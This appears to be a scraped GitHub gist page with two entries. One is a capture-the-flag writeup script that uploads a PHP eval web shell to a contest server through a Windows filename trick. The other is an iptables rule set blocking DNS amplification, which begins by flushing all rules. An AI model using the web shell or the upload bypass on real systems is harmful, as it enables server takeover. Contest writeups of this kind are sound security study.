GeE siamware

@pich4ya
pich4ya / hitbxctf2018_upload.py
Created Apr 14, 2018
HITB-XCTF 2018 - Upload (Web) Writeup
# @author LongCat (Pichaya Morimoto)
import requests, string
# On Windows OS move_uploaded_file function will convert "foo.php"
# followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\) back to "foo.php".
# http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
files = {'file': ('pwn.php ','<?php if(isset($_POST[0])){ eval($_POST[0]); }else{ phpinfo(); } ?>')}
values = {'submit': 'upload'}
phpshell = requests.post('http://47.90.97.18:9999/upload.php', files=files, data=values).text.strip(u'\ufeff').strip()
print phpshell
@guerrerocarlos
guerrerocarlos / block_ddos
Last active Mar 14, 2019
Blocking all ANY queries in DNS server to prevent DDOS DNS amplification attack
iptables --flush
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -m recent --set --name dnsanyquery
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -m recent --name dnsanyquery --rcheck --seconds 60 --hitcount 1 -j DROP
iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname . --qtype ANY) -j DROP
#iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname isc.org --qtype ANY) -j DROP
#iptables -A INPUT -p udp --dport 53 -m u32 --u32 $(python generate-netfilter-u32-dns-rule.py --qname isc.org. --qtype ANY) -j DROP
iptables -A INPUT -p udp --dport 53 -m string --from 50 --algo bm --hex-string '|0000FF0001|' -j DROP
# to block the isc.org attack
iptables -A INPUT -p udp -m string --hex-string "|03697363036f726700|" --algo bm --to 65535 -j DROP